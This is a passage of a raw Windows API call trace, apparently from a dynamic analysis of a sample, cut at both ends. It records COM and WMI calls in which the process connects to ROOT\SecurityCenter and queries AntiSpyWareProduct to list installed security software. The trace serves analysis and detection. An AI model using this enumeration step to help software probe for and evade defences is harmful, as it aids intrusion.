CoTaskMemAlloc (cb=0x4) returned 0x54ba298 [0266.268] IEnumWbemClassObject:Next (in: This=0x663398, lTimeout=-1, uCount=0x1, apObjects=0x54ba298, puReturned=0x23fc5a8 | out: apObjects=0x54ba298*=0x0, puReturned=0x23fc5a8*=0x0) returned 0x1 [0266.269] CoTaskMemFree (pv=0x54ba298) [0266.269] CoGetContextToken (in: pToken=0x19f198 | out: pToken=0x19f198) returned 0x0 [0266.269] WbemLocator:IUnknown:Release (This=0x66fe70) returned 0x1 [0266.269] IUnknown:Release (This=0x663398) returned 0x0 [0266.271] CoGetContextToken (in: pToken=0x19f198 | out: pToken=0x19f198) returned 0x0 [0266.271] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x1 [0266.271] IUnknown:Release (This=0x663528) returned 0x0 [0266.272] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f288 | out: ppv=0x19f288*=0x601a94) returned 0x0 [0266.272] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f280 | out: pAptType=0x19f280*=1) returned 0x0 [0266.272] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f284 | out: ppvObject=0x19f284*=0x0) returned 0x80004002 [0266.272] IUnknown:Release (This=0x601a94) returned 0x1 [0266.273] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ebf0 | out: ppv=0x19ebf0*=0x54ba3a8) returned 0x0 [0266.273] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba3a8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ee08 | out: ppvObject=0x19ee08*=0x0) returned 0x80004002 [0266.274] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba3a8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ee1c | out: ppvObject=0x19ee1c*=0x5542200) returned 0x0 [0266.274] WbemDefPath:IUnknown:Release (This=0x54ba3a8) returned 0x0 [0266.274] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542200, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea3c | out: ppvObject=0x19ea3c*=0x5542200) returned 0x0 [0266.274] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542200, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e9f8 | out: ppvObject=0x19e9f8*=0x0) returned 0x80004002 [0266.274] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542200, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e5ec | out: ppvObject=0x19e5ec*=0x0) returned 0x80004002 [0266.274] WbemDefPath:IUnknown:AddRef (This=0x5542200) returned 0x3 [0266.274] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542200, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e354 | out: ppvObject=0x19e354*=0x0) returned 0x80004002 [0266.274] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542200, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e304 | out: ppvObject=0x19e304*=0x0) returned 0x80004002 [0266.274] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542200, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e310 | out: ppvObject=0x19e310*=0x5544648) returned 0x0 [0266.274] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5544648, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e318 | out: pCid=0x19e318*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.274] WbemDefPath:IUnknown:Release (This=0x5544648) returned 0x3 [0266.274] CoGetContextToken (in: pToken=0x19e370 | out: pToken=0x19e370) returned 0x0 [0266.275] CoGetContextToken (in: pToken=0x19e778 | out: pToken=0x19e778) returned 0x0 [0266.275] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542200, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e808 | out: ppvObject=0x19e808*=0x0) returned 0x80004002 [0266.275] WbemDefPath:IUnknown:Release (This=0x5542200) returned 0x2 [0266.275] WbemDefPath:IUnknown:Release (This=0x5542200) returned 0x1 [0266.275] CoGetContextToken (in: pToken=0x19f100 | out: pToken=0x19f100) returned 0x0 [0266.275] CoGetContextToken (in: pToken=0x19f060 | out: pToken=0x19f060) returned 0x0 [0266.275] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542200, riid=0x19f130*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f12c | out: ppvObject=0x19f12c*=0x5542200) returned 0x0 [0266.275] WbemDefPath:IUnknown:AddRef (This=0x5542200) returned 0x3 [0266.275] WbemDefPath:IUnknown:Release (This=0x5542200) returned 0x2 [0266.275] WbemDefPath:IWbemPath:SetText (This=0x5542200, uMode=0x4, pszPath="ROOT\\SecurityCenter") returned 0x0 [0266.275] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542200, puCount=0x19f2b0 | out: puCount=0x19f2b0*=0x2) returned 0x0 [0266.275] WbemDefPath:IWbemPath:GetText (in: This=0x5542200, lFlags=4, puBuffLength=0x19f2ac*=0x0, pszText=0x0 | out: puBuffLength=0x19f2ac*=0x18, pszText=0x0) returned 0x0 [0266.275] WbemDefPath:IWbemPath:GetText (in: This=0x5542200, lFlags=4, puBuffLength=0x19f2ac*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x19f2ac*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0266.275] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542200, puCount=0x19f29c | out: puCount=0x19f29c*=0x2) returned 0x0 [0266.275] WbemDefPath:IWbemPath:GetText (in: This=0x5542200, lFlags=4, puBuffLength=0x19f298*=0x0, pszText=0x0 | out: puBuffLength=0x19f298*=0x18, pszText=0x0) returned 0x0 [0266.275] WbemDefPath:IWbemPath:GetText (in: This=0x5542200, lFlags=4, puBuffLength=0x19f298*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x19f298*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0266.275] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f230 | out: ppv=0x19f230*=0x601a94) returned 0x0 [0266.276] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f228 | out: pAptType=0x19f228*=1) returned 0x0 [0266.276] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f22c | out: ppvObject=0x19f22c*=0x0) returned 0x80004002 [0266.276] IUnknown:Release (This=0x601a94) returned 0x1 [0266.276] CoGetClassObject (in: rclsid=0x6bdd2c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ee50 | out: ppv=0x19ee50*=0x5544b58) returned 0x0 [0266.277] WbemLocator:IUnknown:QueryInterface (in: This=0x5544b58, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19f068 | out: ppvObject=0x19f068*=0x0) returned 0x80004002 [0266.277] WbemLocator:IClassFactory:CreateInstance (in: This=0x5544b58, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f07c | out: ppvObject=0x19f07c*=0x54ba3a8) returned 0x0 [0266.277] WbemLocator:IUnknown:Release (This=0x5544b58) returned 0x0 [0266.277] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba3a8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec9c | out: ppvObject=0x19ec9c*=0x54ba3a8) returned 0x0 [0266.277] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba3a8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec58 | out: ppvObject=0x19ec58*=0x0) returned 0x80004002 [0266.277] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba3a8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e84c | out: ppvObject=0x19e84c*=0x0) returned 0x80004002 [0266.277] WbemLocator:IUnknown:AddRef (This=0x54ba3a8) returned 0x3 [0266.277] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba3a8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e5b4 | out: ppvObject=0x19e5b4*=0x0) returned 0x80004002 [0266.277] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba3a8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e564 | out: ppvObject=0x19e564*=0x0) returned 0x80004002 [0266.277] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba3a8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e570 | out: ppvObject=0x19e570*=0x0) returned 0x80004002 [0266.278] CoGetContextToken (in: pToken=0x19e5d0 | out: pToken=0x19e5d0) returned 0x0 [0266.278] CoGetContextToken (in: pToken=0x19e9d8 | out: pToken=0x19e9d8) returned 0x0 [0266.278] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba3a8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea68 | out: ppvObject=0x19ea68*=0x0) returned 0x80004002 [0266.278] WbemLocator:IUnknown:Release (This=0x54ba3a8) returned 0x2 [0266.278] WbemLocator:IUnknown:Release (This=0x54ba3a8) returned 0x1 [0266.278] CoGetContextToken (in: pToken=0x19f048 | out: pToken=0x19f048) returned 0x0 [0266.278] CoGetContextToken (in: pToken=0x19efa8 | out: pToken=0x19efa8) returned 0x0 [0266.278] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba3a8, riid=0x19f078*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19f074 | out: ppvObject=0x19f074*=0x54ba3a8) returned 0x0 [0266.278] WbemLocator:IUnknown:AddRef (This=0x54ba3a8) returned 0x3 [0266.278] WbemLocator:IUnknown:Release (This=0x54ba3a8) returned 0x2 [0266.278] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542200, puCount=0x19f20c | out: puCount=0x19f20c*=0x2) returned 0x0 [0266.278] WbemDefPath:IWbemPath:GetText (in: This=0x5542200, lFlags=8, puBuffLength=0x19f208*=0x0, pszText=0x0 | out: puBuffLength=0x19f208*=0x18, pszText=0x0) returned 0x0 [0266.278] WbemDefPath:IWbemPath:GetText (in: This=0x5542200, lFlags=8, puBuffLength=0x19f208*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x19f208*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0266.278] CoCreateInstance (in: rclsid=0x6d3c1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d3c12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x19f0d0 | out: ppv=0x19f0d0*=0x54ba1d8) returned 0x0 [0266.278] WbemLocator:IWbemLocator:ConnectServer (in: This=0x54ba1d8, strNetworkResource="\\\\.\\ROOT\\SecurityCenter", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x19f178 | out: ppNamespace=0x19f178*=0x54b55e0) returned 0x0 [0266.293] WbemLocator:IUnknown:QueryInterface (in: This=0x54b55e0, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f000 | out: ppvObject=0x19f000*=0x66f84c) returned 0x0 [0266.293] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x66f84c, pProxy=0x54b55e0, pAuthnSvc=0x19f050, pAuthzSvc=0x19f04c, pServerPrincName=0x19f044, pAuthnLevel=0x19f048, pImpLevel=0x19f038, pAuthInfo=0x19f03c, pCapabilites=0x19f040 | out: pAuthnSvc=0x19f050*=0xa, pAuthzSvc=0x19f04c*=0x0, pServerPrincName=0x19f044, pAuthnLevel=0x19f048*=0x6, pImpLevel=0x19f038*=0x2, pAuthInfo=0x19f03c, pCapabilites=0x19f040*=0x1) returned 0x0 [0266.294] WbemLocator:IUnknown:Release (This=0x66f84c) returned 0x1 [0266.294] WbemLocator:IUnknown:QueryInterface (in: This=0x54b55e0, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eff4 | out: ppvObject=0x19eff4*=0x66f870) returned 0x0 [0266.294] WbemLocator:IUnknown:QueryInterface (in: This=0x54b55e0, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eff0 | out: ppvObject=0x19eff0*=0x66f84c) returned 0x0 [0266.294] WbemLocator:IClientSecurity:SetBlanket (This=0x66f84c, pProxy=0x54b55e0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0266.294] WbemLocator:IUnknown:Release (This=0x66f84c) returned 0x2 [0266.294] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x1 [0266.294] CoTaskMemFree (pv=0x54bc628) [0266.294] WbemLocator:IUnknown:Release (This=0x54ba1d8) returned 0x0 [0266.294] WbemLocator:IUnknown:QueryInterface (in: This=0x54b55e0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ebf0 | out: ppvObject=0x19ebf0*=0x66f870) returned 0x0 [0266.295] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ebac | out: ppvObject=0x19ebac*=0x0) returned 0x80004002 [0266.295] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e9cc | out: ppvObject=0x19e9cc*=0x0) returned 0x80004002 [0266.296] WbemLocator:IUnknown:QueryInterface (in: This=0x54b55e0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e7a4 | out: ppvObject=0x19e7a4*=0x0) returned 0x80004002 [0266.296] WbemLocator:IUnknown:AddRef (This=0x66f870) returned 0x3 [0266.296] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e50c | out: ppvObject=0x19e50c*=0x0) returned 0x80004002 [0266.297] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e4bc | out: ppvObject=0x19e4bc*=0x0) returned 0x80004002 [0266.297] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e4c8 | out: ppvObject=0x19e4c8*=0x66f7cc) returned 0x0 [0266.297] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66f7cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e4d0 | out: pCid=0x19e4d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.297] WbemLocator:IUnknown:Release (This=0x66f7cc) returned 0x3 [0266.297] CoGetContextToken (in: pToken=0x19e528 | out: pToken=0x19e528) returned 0x0 [0266.297] CoGetContextToken (in: pToken=0x19e930 | out: pToken=0x19e930) returned 0x0 [0266.297] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e9c0 | out: ppvObject=0x19e9c0*=0x66f854) returned 0x0 [0266.297] WbemLocator:IRpcOptions:Query (in: This=0x66f854, pPrx=0x66f870, dwProperty=2, pdwValue=0x19e9e8 | out: pdwValue=0x19e9e8) returned 0x80004002 [0266.297] WbemLocator:IUnknown:Release (This=0x66f854) returned 0x3 [0266.298] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x2 [0266.298] CoGetContextToken (in: pToken=0x19ef00 | out: pToken=0x19ef00) returned 0x0 [0266.298] CoGetContextToken (in: pToken=0x19ee60 | out: pToken=0x19ee60) returned 0x0 [0266.298] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x19ef30*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x19ef2c | out: ppvObject=0x19ef2c*=0x54b55e0) returned 0x0 [0266.298] WbemLocator:IUnknown:AddRef (This=0x54b55e0) returned 0x4 [0266.298] WbemLocator:IUnknown:Release (This=0x54b55e0) returned 0x3 [0266.298] WbemLocator:IUnknown:Release (This=0x54b55e0) returned 0x2 [0266.298] SysStringLen (param_1=0x0) returned 0x0 [0266.298] CoGetContextToken (in: pToken=0x19ef10 | out: pToken=0x19ef10) returned 0x0 [0266.298] WbemLocator:IUnknown:AddRef (This=0x66f870) returned 0x3 [0266.298] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eda4 | out: ppvObject=0x19eda4*=0x66f870) returned 0x0 [0266.298] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x3 [0266.298] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x2 [0266.299] CoGetContextToken (in: pToken=0x19f000 | out: pToken=0x19f000) returned 0x0 [0266.299] WbemLocator:IUnknown:AddRef (This=0x54b55e0) returned 0x3 [0266.299] IWbemServices:ExecQuery (in: This=0x54b55e0, strQueryLanguage="WQL", strQuery="SELECT * FROM AntiSpyWareProduct", lFlags=16, pCtx=0x0, ppEnum=0x19f214 | out: ppEnum=0x19f214*=0x663528) returned 0x0 [0266.310] IUnknown:QueryInterface (in: This=0x663528, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f074 | out: ppvObject=0x19f074*=0x66352c) returned 0x0 [0266.311] IClientSecurity:QueryBlanket (in: This=0x66352c, pProxy=0x663528, pAuthnSvc=0x19f0c4, pAuthzSvc=0x19f0c0, pServerPrincName=0x19f0b8, pAuthnLevel=0x19f0bc, pImpLevel=0x19f0ac, pAuthInfo=0x19f0b0, pCapabilites=0x19f0b4 | out: pAuthnSvc=0x19f0c4*=0xa, pAuthzSvc=0x19f0c0*=0x0, pServerPrincName=0x19f0b8, pAuthnLevel=0x19f0bc*=0x6, pImpLevel=0x19f0ac*=0x2, pAuthInfo=0x19f0b0, pCapabilites=0x19f0b4*=0x1) returned 0x0 [0266.311] IUnknown:Release (This=0x66352c) returned 0x1 [0266.311] IUnknown:QueryInterface (in: This=0x663528, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f068 | out: ppvObject=0x19f068*=0x66f970) returned 0x0 [0266.311] IUnknown:QueryInterface (in: This=0x663528, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f064 | out: ppvObject=0x19f064*=0x66352c) returned 0x0 [0266.311] IClientSecurity:SetBlanket (This=0x66352c, pProxy=0x663528, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0266.315] IUnknown:Release (This=0x66352c) returned 0x2 [0266.315] WbemLocator:IUnknown:Release (This=0x66f970) returned 0x1 [0266.315] CoTaskMemFree (pv=0x54bc118) [0266.315] IUnknown:QueryInterface (in: This=0x663528, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec60 | out: ppvObject=0x19ec60*=0x66f970) returned 0x0 [0266.315] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec1c | out: ppvObject=0x19ec1c*=0x0) returned 0x80004002 [0266.316] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ea3c | out: ppvObject=0x19ea3c*=0x0) returned 0x80004002 [0266.316] IUnknown:QueryInterface (in: This=0x663528, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e814 | out: ppvObject=0x19e814*=0x0) returned 0x80004002 [0266.317] WbemLocator:IUnknown:AddRef (This=0x66f970) returned 0x3 [0266.317] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, 